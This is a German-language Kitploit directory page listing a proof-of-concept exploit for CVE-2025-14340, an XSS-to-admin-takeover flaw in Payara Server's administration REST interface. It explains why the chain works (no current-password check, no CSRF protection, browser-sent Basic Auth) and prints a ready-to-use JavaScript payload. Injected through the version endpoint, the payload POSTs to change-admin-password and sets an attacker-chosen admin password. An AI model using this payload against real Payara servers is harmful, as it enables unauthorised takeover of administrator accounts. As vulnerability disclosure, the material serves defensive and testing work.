Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14340 — PoC for CVE-2025-14340: Admin account takeover in Payara Server | Kitploit
Tools/GitHubGitHub/deepsecurityresearch/cve-2025-14340
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubdeepsecurityresearch/cve-2025-14340

CVE-2025-14340

PoC for CVE-2025-14340: Admin account takeover in Payara Server

Repository anzeigen
11vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XSS zu Admin-Kontoübernahme (CVE-2025-14340)

Eine Cross-Site-Scripting-Schwachstelle in Payaras Administration Rest Interface ermöglicht die Ausführung von vom Angreifer kontrolliertem JavaScript, was zur Übernahme des Admin-Kontos führt. Grund:

  1. Das Panel verwendet HTTP Basic Auth (Anmeldedaten werden vom Browser bei Same-Origin-Anfragen automatisch gesendet).
  2. Der Endpunkt „change-admin-password“ erfordert nicht das aktuelle Passwort, um ein Benutzerpasswort zu aktualisieren.
  3. Das Formular „change-admin-password“ verfügt über keinen CSRF-Schutz.
  4. Ein injiziertes Skript, das die XSS in /management/domain/version verwendet, kann eine POST-Anfrage an /management/domain/change-admin-password senden und ein vom Angreifer gewähltes Passwort für ein beliebiges Zielkonto setzen – was zur Übernahme des Administrator-Kontos führt.

Proof of Concept

URL:

https://panel.example.com:4848/management/domain/version?<PAYLOAD>

PAYLOAD:

root@kitploit:~
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>

Legal

NUR ZUR AUTORISIERTEN NUTZUNG. DeepSecurity Perú unterstützt keinen unbefugten Zugriff und übernimmt keine Verantwortung für jeglichen Missbrauch der bereitgestellten Informationen.

Tool herunterladen